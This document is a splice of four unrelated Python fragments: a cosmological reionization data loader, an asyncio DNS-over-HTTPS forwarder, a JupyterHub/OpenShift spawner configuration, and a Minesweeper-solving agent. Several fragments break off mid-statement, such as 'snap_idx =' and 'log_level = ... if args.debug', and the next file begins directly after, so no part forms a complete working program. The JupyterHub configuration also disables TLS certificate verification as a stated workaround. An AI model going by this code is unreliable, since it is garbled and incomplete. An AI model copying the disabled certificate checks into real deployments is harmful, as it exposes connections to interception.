nion_factor_allmodels = []
cosmology_allmodels = []
t_bigbang_allmodels = []
# Be careful, we use neutral fraction values here.
volume_frac_allmodels = []
mass_frac_allmodels = []
# These are the nion grids used in cifog, so these are **actual** escaping
# ionizing photons.
nion_allmodels = []
# Power Spectra.
k_allmodels = []
P21_allmodels = []
PHII_allmodels = []
# All outer arrays set up, time to read in the data!
for model_number, (reion_ini_file, gal_ini_file) in \
enumerate(zip(reion_ini_files, gal_ini_files)):
if rank == 0:
print("Model {0}".format(model_number))
# Read in the parameters and set some initial variables.
SAGE_params = rs.read_SAGE_ini(gal_ini_file)
cifog_params, _ = rs.read_cifog_ini(reion_ini_file, SAGE_params)
cosmology, t_bigbang = gd.set_cosmology(float(SAGE_params["Hubble_h"]),
float(SAGE_params["Omega"]),
float(cifog_params["omega_b"]))
cosmology_allmodels.append(cosmology)
t_bigbang_allmodels.append(t_bigbang)
first_snap = int(SAGE_params["LowSnap"])
first_snap_allmodels.append(first_snap)
last_snap = int(SAGE_params["LastSnapShotNr"])
last_snap_allmodels.append(last_snap)
GridSize = int(SAGE_params["GridSize"])
GridSize_allmodels.append(GridSize)
# Careful, cifog uses Mpc/h.
boxsize = float(SAGE_params["BoxSize"])
boxsize_allmodels.append(boxsize)
# However, we work with the volume in Mpc^3.
model_volume = pow(float(SAGE_params["BoxSize"]) / \
float(SAGE_params["Hubble_h"]),3)
helium = float(cifog_params["Y"])
helium_allmodels.append(helium)
nion_factor = float(cifog_params["nion_factor"])
nion_factor_allmodels.append(nion_factor)
model_hubble_h = float(SAGE_params["Hubble_h"])
model_halopartcut = int(SAGE_params["HaloPartCut"])
# Load the redshift file and calculate the lookback times.
z_array_full, lookback_array_full = gd.load_redshifts(SAGE_params["FileWithSnapList"],
cosmology, t_bigbang)
z_array_reion = np.array(z_array_full[first_snap:last_snap])
lookback_array_reion = np.array(lookback_array_full[first_snap:last_snap])
z_array_reion_allmodels.append(z_array_reion)
lookback_array_reion_allmodels.append(lookback_array_reion)
# Determine the base file names for the ionization, ionizing photons
# and density fields.
XHII_fbase = cifog_params["output_XHII_file"]
XHII_fbase_allmodels.append(XHII_fbase)
density_fbase = cifog_params["inputIgmDensityFile"]
density_fbase_allmodels.append(density_fbase)
zreion_path = "{0}/{1}".format(SAGE_params["PhotoionDir"],
SAGE_params["ReionRedshiftName"])
zreion_path_allmodels.append(zreion_path)
nion_fbase = cifog_params["inputNionFile"]
# cifog uses 0 for floating point and 1 for double precision.
# I use 0 for integer, 1 for floating point and 2 for double precision.
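# (e.g. a cifog value of 0, single precision, maps to 1 here and a cifog value
# of 1, double precision, maps to 2; hence the "+= 1" shifts below.)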
density_precision = int(cifog_params["densityFilesAreInDoublePrecision"])
density_precision += 1
density_precision_allmodels.append(density_precision)
nion_precision = int(cifog_params["nionFilesAreInDoublePrecision"])
nion_precision += 1
# The ionization fields are assumed to have double precision.
XHII_precision = 2
XHII_precision_allmodels.append(XHII_precision)
# Now it's time to set up all the arrays for this model number.
volume_frac_allmodels.append(np.zeros(last_snap - first_snap))
mass_frac_allmodels.append(np.zeros(last_snap - first_snap))
nion_allmodels.append(np.zeros(last_snap - first_snap))
k_allmodels.append([])
P21_allmodels.append([])
PHII_allmodels.append([])
# All arrays done, now loop over snapshots and read in.
for snapnum in range(first_snap + rank, last_snap, size):
# Where this snapshot slices into the global arrays.
snap_idx =
#!/usr/bin/env python3
import argparse
import array
import asyncio as aio
import base64
import itertools
import logging
import random
import statistics
from abc import ABCMeta, abstractmethod
from asyncio import DatagramTransport, Lock, StreamReader, StreamWriter, Task
from types import TracebackType
from typing import (ClassVar, Iterable, Iterator, List, Optional, Sequence,
Set, SupportsFloat, Tuple, Type, Union)
import httpx
DEFAULT_LISTEN_ADDRESSES = \
[
'127.0.0.1',
'::1',
]
DEFAULT_LISTEN_PORTS = \
[
5053,
]
DEFAULT_UPSTREAMS = \
[
'https://192.168.3.11:443/dns-query',
'https://172.16.31.10:443/dns-query',
'https://[fc00:db20:35b:7399::5]:443/dns-query',
'https://[2606:fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b]:443/dns-query',
]
async def main(args) -> None:
# Setup event loop
loop = aio.get_running_loop()
# Setup DNS resolver to cache/forward queries and answers
async with AsyncDnsResolver(args.upstreams, AsyncDohUpstreamContext) as resolver:
transports = []
# Setup listening transports
for addr in args.listen_address:
for port in args.listen_port:
# Setup UDP server
logging.info('Starting UDP server listening on %s#%d' % (addr, port))
udp, _ = await loop.create_datagram_endpoint(lambda: UdpResolverProtocol(resolver), local_addr=(addr, port))
transports.append(udp)
# Setup TCP server
if args.tcp:
logging.info('Starting TCP server listening on %s#%d' % (addr, port))
tcp = await aio.start_server(TcpResolverProtocol(resolver).ahandle_peer, addr, port)
transports.append(tcp)
# Serve forever
try:
while True:
await aio.sleep(3600)
logging.info(resolver.get_stats())
except (KeyboardInterrupt, SystemExit):
pass
logging.info('Shutting down DNS over HTTPS forwarder')
wait_closers = []
for transport in transports:
transport.close()
if hasattr(transport, 'wait_closed'):
wait_closers.append(aio.create_task(transport.wait_closed()))
await aio.wait(wait_closers)
await aio.sleep(0.3)
class AsyncDnsUpstreamContext(metaclass=ABCMeta):
"""A base class used to manage upstream DNS server connections and metadata."""
RTT_WINDOW_SIZE: ClassVar[int] = 10
def __init__(self, host: str) -> None:
self.host = host
self.queries = 0
self.answers = 0
self._rtts = array.array('d', [0.0])
self._rtts_index: Iterator[int] = itertools.cycle(range(self.RTT_WINDOW_SIZE))
async def __aenter__(self) -> 'AsyncDnsUpstreamContext':
return self
async def __aexit__(self,
exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> None:
await self.aclose()
@property
def avg_rtt(self) -> float:
"""The average rtt or latency (in seconds) for DNS requests to this upstream DNS server."""
return statistics.fmean(self._rtts)
def add_rtt_sample(self, rtt: SupportsFloat) -> None:
"""Add a new rtt sample to help compute the average rtt for this upstream DNS server."""
i = next(self._rtts_index)
self._rtts[i:i+1] = array.array('d', [float(rtt)])
def get_stats(self) -> str:
"""Returns a formatted string of statistics for this upstream server."""
return f'{self.host} (rtt: {self.avg_rtt:.3f} s, queries: {self.queries}, answers: {self.answers})'
@abstractmethod
async def aforward_query(self, query: bytes) -> bytes:
"""Resolve a DNS query via forwarding to a upstream DNS server.
Params:
query - A wireformat DNS query packet.
Returns:
A wireformat DNS answer packet.
Notes:
This coroutine is safely cancellable. That is, even if the
coroutine is cancelled, it still leaves any internal state
it uses in a consistent and usable state.
"""
...
@abstractmethod
async def aclose(self) -> None:
"""Close any open connections to the upstream DNS server."""
...
class AsyncDohUpstreamContext(AsyncDnsUpstreamContext):
"""A class used to manage upstream DoH server connections and metadata."""
SESSION_LIMITS: ClassVar[httpx.Limits] = httpx.Limits(max_keepalive_connections=1, max_connections=3, keepalive_expiry=60.0)
SESSION_TIMEOUTS: ClassVar[httpx.Timeout] = httpx.Timeout(None)
def __init__(self, url: str) -> None:
super().__init__(url)
self.session = httpx.AsyncClient(
limits=self.SESSION_LIMITS,
timeout=self.SESSION_TIMEOUTS,
headers={'accept': 'application/dns-message'},
http2=True)
async def aforward_post(self, query: bytes) -> Tuple[bytes, float]:
"""Resolve a DNS query via forwarding to a upstream DoH server (POST).
Params:
query - A wireformat DNS query packet.
Returns:
A wireformat DNS answer packet and rtt sample.
Notes:
Using DNS over HTTPS POST format as described here:
https://datatracker.ietf.org/doc/html/rfc8484
https://developers.cloudflare.com/1.1.1.1/dns-over-https/wireformat/
"""
# Send HTTP request to upstream DoH server and wait for the response
response = await aio.shield(
self.session.post(
self.host,
headers={'content-type': 'application/dns-message'},
content=query))
# Parse HTTP response
response.raise_for_status()
answer = response.read()
rtt = response.elapsed.total_seconds()
# Return the DNS answer
return (answer, rtt)
async def aforward_get(self, query: bytes) -> Tuple[bytes, float]:
"""Resolve a DNS query via forwarding to a upstream DoH server (GET).
Params:
query - A wireformat DNS query packet.
Returns:
A wireformat DNS answer packet and rtt sample.
Notes:
Using DNS over HTTPS GET format as described here:
https://datatracker.ietf.org/doc/html/rfc8484
https://developers.cloudflare.com/1.1.1.1/dns-over-https/wireformat/
"""
# Encode DNS query into url
url = ''.join([self.host, '?dns=', base64.urlsafe_b64encode(query).rstrip(b'=').decode()])
# Send HTTP request to upstream DoH server and wait for the response
response = await aio.shield(self.session.get(url))
# Parse HTTP response
response.raise_for_status()
answer = response.read()
rtt = response.elapsed.total_seconds()
# Return the DNS answer
return (answer, rtt)
async def aforward_query(self, query: bytes) -> bytes:
self.queries += 1
query = memoryview(query)
qid = query[:2]
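# The original DNS message ID (first two bytes) is kept here; the request sent
# upstream uses an ID of zero (as RFC 8484 suggests for HTTP cache friendliness)
# and the saved ID is spliced back into the answer below.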
# Forward the DNS query to the upstream DoH server
try:
logging.debug(f'Sending query {qid.hex()} to {self.host} --->')
answer, rtt = await self.aforward_post(b''.join([b'\0' * 2, query[2:]]))
self.add_rtt_sample(rtt)
self.answers += 1
logging.debug(f'Receiving answer {qid.hex()} from {self.host} ({rtt}) <---')
return b''.join([qid, memoryview(answer)[2:]])
# Raise connection error
except (httpx.NetworkError, httpx.RemoteProtocolError):
raise ConnectionError(f'DNS query to DoH server {self.host} failed due to network errors')
# Raise abnormal HTTP status codes
except httpx.HTTPStatusError as exc:
raise ConnectionError(f'received HTTP error status from DoH server {self.host} ({exc.response.status_code})')
async def aclose(self) -> None:
await self.session.aclose()
class AsyncDnsResolver:
"""A class that manages upstream DNS server contexts and resolves DNS queries."""
DEFAULT_QUERY_TIMEOUT: ClassVar[float] = 3.0
def __init__(self, upstreams: Iterable[str], context_class: Type[AsyncDnsUpstreamContext]) -> None:
self._upstreams = tuple(context_class(upstream) for upstream in upstreams)
if not self._upstreams:
raise ValueError('iterable of upstreams must have at least one entry')
async def __aenter__(self) -> 'AsyncDnsResolver':
return self
async def __aexit__(self,
exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> None:
await self.aclose()
@property
def queries(self) -> int:
return sum(upstream.queries for upstream in self._upstreams)
@property
def answers(self) -> int:
return sum(upstream.answers for upstream in self._upstreams)
@property
def avg_rtt(self) -> float:
return statistics.fmean(upstream.avg_rtt for upstream in self._upstreams)
def get_stats(self) -> str:
"""Returns a formatted string of statistics for this resolver."""
return f'Statistics for resolver at 0x{id(self):x} (avg_rtt: {self.avg_rtt:.3f} s, total_queries: {self.queries}, total_answers: {self.answers})'
async def aresolve(self, query: bytes, timeout: float = DEFAULT_QUERY_TIMEOUT) -> bytes:
"""Resolve a DNS query via forwarding to upstream DNS servers.
Params:
query - A wireformat DNS query packet.
timeout - The maximum amount of time (in seconds) to wait for the receipt of the DNS answer packet.
Returns:
A wireformat DNS answer packet.
"""
# Forward the DNS query and return the DNS answer
# (perform a staggered race and accept the earliest response)
async def astaggered_resolution(upstreams: Sequence[AsyncDnsUpstreamContext], period: float) -> bytes:
assert len(upstreams) > 0
winner: Task = None
racers: Set[Task] = set()
errors: List[BaseException] = []
# Wait for the first racer to finish and cleanup exceptions
async def await_first_racer(timeout: float = None) -> bool:
nonlocal winner
nonlocal racers
nonlocal errors
done, racers = await aio.wait(racers, timeout=timeout, return_when=aio.FIRST_COMPLETED)
for racer in done:
error = racer.exception()
if error is None:
winner = racer
break
else:
errors.append(error)
return winner is not None
try:
for upstream in upstreams:
racers.add(aio.create_task(upstream.aforward_query(query)))
if await await_first_racer(period):
return winner.result()
while racers:
if await await_first_racer():
return winner.result()
finally:
for loser in racers:
loser.cancel()
def raise_multi_error(errors: Iterable[BaseException]) -> None:
class MultiError(*frozenset(type(error) for error in errors)):
pass
raise MultiError
assert len(errors) == len(upstreams)
raise_multi_error(errors)
# Weighted random shuffle the upstream servers by average latency
k = len(self._upstreams)
rtts = tuple(upstream.avg_rtt for upstream in self._upstreams)
max_rtt = max(rtts)
weights = (max_rtt - rtt + 0.001 for rtt in rtts)
upstreams = random.choices(self._upstreams, weights=weights, k=k)
period = (timeout / 2) / k if timeout is not None else 0.1
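# Illustrative numbers: avg rtts of 0.02s and 0.08s give weights of 0.061 and
# 0.001, so the faster upstream is usually raced first; with the default
# timeout of 3.0s and two upstreams the stagger period is (3.0 / 2) / 2 = 0.75s.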
# Forward the DNS query and return the DNS answer
try:
return await aio.wait_for(astaggered_resolution(upstreams, period), timeout)
# Raise timeout error
except aio.TimeoutError:
raise TimeoutError('DNS query expired and was cancelled')
async def aclose(self) -> None:
"""Close all upstream DoH server connections."""
for upstream in self._upstreams:
await upstream.aclose()
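# Illustrative usage of this class (the upstream URL is an example only):
#   async with AsyncDnsResolver(['https://1.1.1.1/dns-query'], AsyncDohUpstreamContext) as resolver:
#       answer = await resolver.aresolve(wireformat_query)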
class UdpResolverProtocol(aio.DatagramProtocol):
"""Protocol for serving UDP DNS requests via a DnsResolver instance."""
def __init__(self, resolver: AsyncDnsResolver) -> None:
self.resolver = resolver
self.buffer = []
self.worker = None
def connection_made(self, transport: DatagramTransport) -> None:
self.transport = transport
def datagram_received(self, data: bytes, peer: Tuple[str, int]) -> None:
logging.debug(f'Got UDP DNS query from {peer}')
# Add query to buffer
self.buffer.append((peer, data))
# Schedule query processing task if necessary
if self.worker is None:
self.worker = aio.create_task(self.ahandle_queries())
async def ahandle_queries(self) -> None:
while self.buffer:
tasks = set(aio.create_task(self.ahandle_query(peer, query)) for peer, query in self.buffer)
del self.buffer[:]
while tasks:
done, tasks = await aio.wait(tasks, timeout=0.05)
for task in done:
error = task.exception()
if error is None:
peer, answer = task.result()
self.transport.sendto(answer, peer)
else:
logging.warning(f'UDP DNS query resolution encountered an error - {error!r}')
self.worker = None
async def ahandle_query(self, peer: Tuple[str, int], query: bytes) -> Tuple[Tuple[str, int], bytes]:
return (peer, await self.resolver.aresolve(query))
class TcpResolverProtocol:
"""Protocol for serving TCP DNS requests via a DnsResolver instance."""
def __init__(self, resolver: AsyncDnsResolver) -> None:
self.resolver = resolver
async def ahandle_peer(self, reader: StreamReader, writer: StreamWriter) -> None:
"""Read all DNS queries from the peer stream and schedule their resolution via a DnsResolver instance."""
tasks: Union[List[Task], Set[Task]] = []
wlock = aio.Lock()
logging.debug(f'Got TCP DNS query stream from {writer.transport.get_extra_info("peername")}')
while True:
# Parse a DNS query packet off of the wire
try:
query_size = int.from_bytes(await reader.readexactly(2), 'big')
query = await reader.readexactly(query_size)
# Check if our peer has finished writing to the stream
except aio.IncompleteReadError:
break
# Schedule the processing of the query
tasks.append(aio.create_task(self.ahandle_query(writer, wlock, query)))
# Wait for all scheduled query processing to finish
while tasks:
done, tasks = await aio.wait(tasks, return_when=aio.FIRST_COMPLETED)
for task in done:
error = task.exception()
if error is not None:
logging.warning(f'TCP DNS query resolution encountered an error - {error!r}')
if not writer.is_closing():
# Indicate we are done writing to the stream
if writer.can_write_eof():
writer.write_eof()
# Close the stream
writer.close()
await writer.wait_closed()
async def ahandle_query(self, writer: StreamWriter, wlock: Lock, query: bytes) -> None:
"""Resolve a DNS query and write the DNS answer to the peer stream."""
if writer.is_closing():
return
# Resolve DNS query
answer = await self.resolver.aresolve(query)
if writer.is_closing():
return
# Create the DNS answer packet
answer_size = len(answer).to_bytes(2, 'big')
answer = b''.join([answer_size, answer])
# Write the DNS answer to the peer stream
async with wlock:
if writer.is_closing():
return
await writer.drain()
if writer.is_closing():
return
writer.write(answer)
if __name__ == '__main__':
# Handle command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('-l', '--listen-address', nargs='+', default=DEFAULT_LISTEN_ADDRESSES,
help='addresses to listen on for DNS over HTTPS requests (default: %(default)s)')
parser.add_argument('-p', '--listen-port', nargs='+', type=int, default=DEFAULT_LISTEN_PORTS,
help='ports to listen on for DNS over HTTPS requests (default: %(default)s)')
parser.add_argument('-u', '--upstreams', nargs='+', default=DEFAULT_UPSTREAMS,
help='upstream servers to forward DNS queries and requests to (default: %(default)s)')
parser.add_argument('-t', '--tcp', action='store_true', default=False,
help='serve TCP based queries and requests along with UDP (default: %(default)s)')
parser.add_argument('-f', '--file', default=None,
help='file to store logging output to (default: %(default)s)')
parser.add_argument('-d', '--debug', action='store_true', default=False,
help='enable debugging on the internal asyncio event loop (default: %(default)s)')
args = parser.parse_args()
# Setup logging
log_level = 'DEBUG' if args.debug
# This file provides common configuration for the different ways that
# the deployment can run. Configuration specific to the different modes
# will be read from separate files at the end of this configuration
# file.
import os
import json
import string
import yaml
import threading
import time
import requests
import wrapt
from tornado import gen
from kubernetes.client.rest import ApiException
from kubernetes.client.configuration import Configuration
from kubernetes.config.incluster_config import load_incluster_config
from kubernetes.client.api_client import ApiClient
from openshift.dynamic import DynamicClient, Resource
from openshift.dynamic.exceptions import ResourceNotFoundError
# The workshop name and configuration type are passed in through the
# environment. The application name should be the value used for the
# deployment, and more specifically, must match the name of the route.
workshop_name = os.environ.get('WORKSHOP_NAME')
application_name = os.environ.get('APPLICATION_NAME')
if not workshop_name:
workshop_name = 'homeroom'
if not application_name:
application_name = workshop_name
print('INFO: Workshop name is %r.' % workshop_name)
print('INFO: Application name is %r.' % application_name)
configuration_type = os.environ.get('CONFIGURATION_TYPE', 'hosted-workshop')
print('INFO: Configuration type is %r.' % configuration_type)
homeroom_link = os.environ.get('HOMEROOM_LINK')
print('INFO: Homeroom link is %r.' % homeroom_link)
homeroom_name = os.environ.get('HOMEROOM_NAME')
print('INFO: Homeroom name is %r.' % homeroom_name)
# Work out the service account name and name of the namespace that the
# deployment is in.
service_account_path = '/var/run/secrets/kubernetes.io/serviceaccount'
service_account_name = '%s-spawner' % application_name
print('INFO: Service account name is %r.' % service_account_name)
with open(os.path.join(service_account_path, 'namespace')) as fp:
namespace = fp.read().strip()
print('INFO: Namespace is %r.' % namespace)
full_service_account_name = 'system:serviceaccount:%s:%s' % (
namespace, service_account_name)
print('INFO: Full service account name is %r.' % full_service_account_name)
# Determine the Kubernetes REST API endpoint and cluster information,
# including working out the address of the internal image registry.
kubernetes_service_host = os.environ['KUBERNETES_SERVICE_HOST']
kubernetes_service_port = os.environ['KUBERNETES_SERVICE_PORT']
kubernetes_server_url = 'https://%s:%s' % (kubernetes_service_host,
kubernetes_service_port)
kubernetes_server_version_url = '%s/version' % kubernetes_server_url
with requests.Session() as session:
response = session.get(kubernetes_server_version_url, verify=False)
kubernetes_server_info = json.loads(response.content.decode('UTF-8'))
image_registry = 'image-registry.openshift-image-registry.svc:5000'
if kubernetes_server_info['major'] == '1':
if kubernetes_server_info['minor'] in ('10', '10+', '11', '11+'):
image_registry = 'docker-registry.default.svc:5000'
# Initialise the client for the REST API used doing configuration.
#
# XXX Currently have a workaround here for OpenShift 4.0 beta versions
# which disables verification of the certificate. If we don't use this, the
# Python openshift/kubernetes clients will fail. We also disable any
# warnings from urllib3 to get rid of the noise in the logs this creates.
load_incluster_config()
import urllib3
urllib3.disable_warnings()
instance = Configuration()
instance.verify_ssl = False
Configuration.set_default(instance)
api_client = DynamicClient(ApiClient())
try:
image_stream_resource = api_client.resources.get(
api_version='image.openshift.io/v1', kind='ImageStream')
except ResourceNotFoundError:
image_stream_resource = None
try:
route_resource = api_client.resources.get(
api_version='route.openshift.io/v1', kind='Route')
except ResourceNotFoundError:
route_resource = None
ingress_resource = api_client.resources.get(
api_version='networking.k8s.io/v1', kind='Ingress')
# Create a background thread to dynamically calculate the back link to the
# Homeroom workshop picker if no explicit link is provided but a homeroom
# name is.
def watch_for_homeroom():
global homeroom_link
while True:
if route_resource is not None:
try:
route = route_resource.get(namespace=namespace, name=homeroom_name)
scheme = 'http'
if route.metadata.annotations:
if route.metadata.annotations['homeroom/index'] == homeroom_name:
if route.tls and route.tls.termination:
scheme = 'https'
link = '%s://%s' % (scheme, route.spec.host)
if link != homeroom_link:
print('INFO: Homeroom link set to %s.' % link)
homeroom_link = link
except ApiException as e:
if e.status != 404:
print('ERROR: Error looking up homeroom route. %s' % e)
except Exception as e:
print('ERROR: Error looking up homeroom route. %s' % e)
try:
ingress = ingress_resource.get(namespace=namespace, name=homeroom_name)
scheme = 'http'
if ingress.metadata.annotations:
if ingress.metadata.annotations['homeroom/index'] == homeroom_name:
if ingress.tls:
scheme = 'https'
link = '%s://%s' % (scheme, ingress.spec.rules[0].host)
if link != homeroom_link:
print('INFO: Homeroom link set to %s.' % link)
homeroom_link = link
except ApiException as e:
if e.status != 404:
print('ERROR: Error looking up homeroom ingress. %s' % e)
except Exception as e:
print('ERROR: Error looking up homeroom ingress. %s' % e)
time.sleep(15)
if not homeroom_link and homeroom_name:
thread = threading.Thread(target=watch_for_homeroom)
thread.daemon = True
thread.start()
# Workaround bug in minishift where a service cannot be contacted from a
# pod which backs the service. For further details see the minishift issue
# https://github.com/minishift/minishift/issues/2400.
#
# What these workarounds do is monkey patch the JupyterHub proxy client
# API code, and the code for creating the environment for local service
# processes, and when it sees something which uses the service name as
# the target in a URL, it replaces it with localhost. These work because
# the proxy/service processes are in the same pod. It is not possible to
# change hub_connect_ip to localhost because that is passed to other
# pods which need to contact back to JupyterHub, and so it must be left
# as the service name.
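# Illustrative rewrite performed by the wrappers below (hostname is an example
# only, assuming an application name of 'myworkshop'):
#   'http://myworkshop-spawner:8081/...' -> 'http://127.0.0.1:8081/...'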
@wrapt.patch_function_wrapper('jupyterhub.proxy', 'ConfigurableHTTPProxy.add_route')
def _wrapper_add_route(wrapped, instance, args, kwargs):
def _extract_args(routespec, target, data, *_args, **_kwargs):
return (routespec, target, data, _args, _kwargs)
routespec, target, data, _args, _kwargs = _extract_args(*args, **kwargs)
old = 'http://%s:%s' % (c.JupyterHub.hub_connect_ip, c.JupyterHub.hub_port)
new = 'http://127.0.0.1:%s' % c.JupyterHub.hub_port
if target.startswith(old):
target = target.replace(old, new)
return wrapped(routespec, target, data, *_args, **_kwargs)
@wrapt.patch_function_wrapper('jupyterhub.spawner', 'LocalProcessSpawner.get_env')
def _wrapper_get_env(wrapped, instance, args, kwargs):
env = wrapped(*args, **kwargs)
target = env.get('JUPYTERHUB_API_URL')
old = 'http://%s:%s' % (c.JupyterHub.hub_connect_ip, c.JupyterHub.hub_port)
new = 'http://127.0.0.1:%s' % c.JupyterHub.hub_port
if target and target.startswith(old):
target = target.replace(old, new)
env['JUPYTERHUB_API_URL'] = target
return env
# Define all the defaults for the JupyterHub instance for our setup.
c.JupyterHub.port = 8080
c.JupyterHub.hub_ip = '0.0.0.0'
c.JupyterHub.hub_port = 8081
c.JupyterHub.hub_connect_ip = '%s-spawner' % application_name
c.ConfigurableHTTPProxy.api_url = 'http://127.0.0.1:8082'
c.Spawner.start_timeout = 180
c.Spawner.http_timeout = 60
c.KubeSpawner.port = 10080
c.KubeSpawner.common_labels = {
'app': '%s' % application_name
}
c.KubeSpawner.extra_labels = {
'spawner': configuration_type,
'class': 'session',
'user': '{username}'
}
c.KubeSpawner.uid = os.getuid()
c.KubeSpawner.fs_gid = os.getuid()
c.KubeSpawner.extra_annotations = {
"alpha.image.policy.openshift.io/resolve-names": "*"
}
c.KubeSpawner.cmd = ['start-singleuser.sh']
c.KubeSpawner.pod_name_template = '%s-user-{username}' % application_name
c.JupyterHub.admin_access = False
if os.environ.get('JUPYTERHUB_COOKIE_SECRET'):
c.JupyterHub.cookie_secret = os.environ[
'JUPYTERHUB_COOKIE_SECRET'].encode('UTF-8')
else:
c.JupyterHub.cookie_secret_file = '/opt/app-root/data/cookie_secret'
c.JupyterHub.db_url = '/opt/app-root/data/database.sqlite'
c.JupyterHub.authenticator_class = 'tmpauthenticator.TmpAuthenticator'
c.JupyterHub.spawner_class = 'kubespawner.KubeSpawner'
c.JupyterHub.logo_file = '/opt/app-root/src/images/HomeroomIcon.png'
c.Spawner.environment = dict()
c.JupyterHub.services = []
c.KubeSpawner.init_containers = []
c.KubeSpawner.extra_containers = []
c.JupyterHub.extra_handlers = []
# Determine amount of memory to allocate for workshop environment.
def convert_size_to_bytes(size):
multipliers = {
'k': 1000,
'm': 1000**2,
'g': 1000**3,
't': 1000**4,
'ki': 1024,
'mi': 1024**2,
'gi': 1024**3,
'ti': 1024**4,
}
size = str(size)
for suffix in multipliers:
if size.lower().endswith(suffix):
return int(size[0:-len(suffix)]) * multipliers[suffix]
else:
if size.lower().endswith('b'):
return int(size[0:-1])
try:
return int(size)
except ValueError:
raise RuntimeError('"%s" is not a valid memory specification. Must be an integer or a string with suffix K, M, G, T, Ki, Mi, Gi or Ti.' % size)
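# Illustrative conversions (not executed): convert_size_to_bytes('512Mi') gives
# 536870912, convert_size_to_bytes('2G') gives 2000000000 and
# convert_size_to_bytes('1024') gives 1024.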
c.Spawner.mem_limit = convert_size_to_bytes(
os.environ.get('WORKSHOP_MEMORY', '512Mi'))
# Override the image details with those for the terminal or dashboard
# image being used. The default is to assume that an image stream with
# the same name as the application name is being used. The call to the
# function resolve_image_name() tries to resolve the image through the
# image registry when an image stream is used. This works around the
# issue that many clusters do not have the image policy controller
# configured correctly.
#
# Note that we set the policy that images will always be pulled to the
# node each time when the image name is not explicitly provided. This is
# so that during development, changes to the terminal image will always
# be picked up. Someone developing a new image need only update the
# 'latest' tag on the image using 'oc tag'.
#
# The check for TERMINAL_IMAGE is for backward compatibility. Use
# WORKSHOP_IMAGE now.
workshop_image = os.environ.get('WORKSHOP_IMAGE')
if not workshop_image:
workshop_image = os.environ.get('TERMINAL_IMAGE')
if not workshop_image:
c.KubeSpawner.image_pull_policy = 'Always'
workshop_image = '%s-session:latest' % application_name
def resolve_image_name(name):
# If there is no image stream resource, we are on plain Kubernetes.
if image_stream_resource is None:
return name
# If the image name contains a slash, we assume it is already
# referring to an image on some image registry. Even if it does
# not contain a slash, it may still be hosted on docker.io.
if name.find('/') != -1:
return name
# Separate actual source image name and tag for the image from the
# name. If the tag is not supplied, default to 'latest'.
parts = name.split(':', 1)
if len(parts) == 1:
source_image, tag = parts[0], 'latest'
else:
source_image, tag = parts
# See if there is an image stream in the current project with the
# target name.
try:
image_stream = image_stream_resource.get(namespace=namespace,
name=source_image)
except ApiException as e:
if e.status not in (403, 404):
raise
return name
# If we get here then the image stream exists with the target name.
# We need to determine if the tag exists. If it does exist, we
# extract out the full name of the image including the reference
# to the image registry it is hosted on.
if image_stream.status.tags:
for entry in image_stream.status.tags:
if entry.tag == tag:
registry_image = image_stream.status.dockerImageRepository
if registry_image:
return '%s:%s' % (registry_image, tag)
# Use original value if can't find a matching tag.
return name
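# Illustrative resolution (names are examples only): with an image stream called
# 'myworkshop-session' in the namespace whose 'latest' tag is populated,
# resolve_image_name('myworkshop-session:latest') returns something like
# 'image-registry.openshift-image-registry.svc:5000/<namespace>/myworkshop-session:latest',
# otherwise the name is returned unchanged.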
c.KubeSpawner.image = resolve_image_name(workshop_image)
# Work out
tile = col_to_tile.get(col)
# they are safe
if tile not in safe:
safe.append(tile)
# case when there are only negative coefficients on the left
if neg_onesCount > 0 and onesCount == 0:
for col in negList:
tile = col_to_tile.get(col)
# they are mines
if tile not in mines:
mines.append(tile)
# case when the total number of mines is positive
if last > 0:
# ignore the negative coefficients
if onesCount == last:
for col in onesList:
tile = col_to_tile.get(col)
if tile not in mines:
mines.append(tile)
for col in negList:
tile = col_to_tile.get(col)
if tile not in safe:
safe.append(tile)
# case when the total number of mines is negative
if last < 0:
# ignore the positive coefficients
if neg_onesCount == last:
for col in onesList:
tile = col_to_tile.get(col)
if tile not in safe:
safe.append(tile)
for col in negList:
tile = col_to_tile.get(col)
if tile not in mines:
mines.append(tile)
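# Worked example (illustrative): a reduced row equivalent to t1 + t2 - t3 = 2
# has onesCount = 2 and last = 2, so onesCount == last and the deduction above
# marks t1 and t2 as mines and t3 as safe.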
# update the knowledge base
if mines != []:
for _ in mines:
self.markMines(_)
# update the knowledge base and append to the safe queue
if safe != []:
for _ in safe:
if _ in self.unknown and _ not in self.safeQ:
self.safeQ.append(_)
# uncover all the safe ones
while (self.safeQ != deque([])):
# get the left most tile in the safe queue
cr = self.safeQ.popleft()
# update the knowledge base
self.logMove(AI.Action(1), cr[0], cr[1])
# return the action to the World
return Action(AI.Action(1), cr[0], cr[1])
""" Part V: Guesses """
# assign heuristics to each tile: number of mines / number of unexplored
if self.unknown != []:
keys = self.unknown
values = [self.minesLeft/len(self.unknown)]*len(self.unknown)
self.prob = dict(zip(keys, values))
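# e.g. with minesLeft = 10 and 40 unknown tiles, every unknown tile starts with
# a prior of 10 / 40 = 0.25 before the per-constraint refinement below.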
for col in range(0, self.col):
for row in range(0, self.row):
percept = self.board[col][row].number
num_mines = self.surMines(col, row)[0]
num_covered = self.surCovered(col, row)[0]
if ((percept > 0) and \
(num_covered - num_mines > 0)):
mines = self.surMines(col, row)[1]
covered = self.surCovered(col, row)[1]
for _ in covered:
if (_ not in mines) and (_ not in self.safeQ):
# only get the maximum probability of being a mine
self.prob[_] = max( ( percept-num_mines ) / \
num_covered,\
self.prob[_])
# get the corners first
corners = [(self.col-1, self.row-1), \
(0, 0), \
(self.col-1, 0), \
(0, self.row-1)]
for _ in corners:
if _ in self.unknown:
self.prob[_] = self.prob[_]-1
if (self.unknown != []):
# only uncover the least possible mines
minList = self.minList(self.prob)
self.safeQ.append(random.choice(minList))
if (self.minesLeft == 0):
return Action(AI.Action(0))
# uncover all the safe ones
while (self.safeQ != deque([])):
# get the left most tile in the safe queue
cr = self.safeQ.popleft()
# update the knowledge base
self.logMove(AI.Action(1), cr[0], cr[1])
# return the action to the World
return Action(AI.Action(1), cr[0], cr[1])
if (self.minesLeft == 0):
return Action(AI.Action(0))
###########################################################################
# organize movesMade #
###########################################################################
def markMines(self, coord):
""" update the KB if a mine is found """
col = coord[0]
row = coord[1]
if (col, row) not in self.mines:
self.minesLeft -= 1
self.mines.append((col, row))
self.board[col][row].mine = True
self.board[col][row].flag = True
self.unknown.remove((col, row))
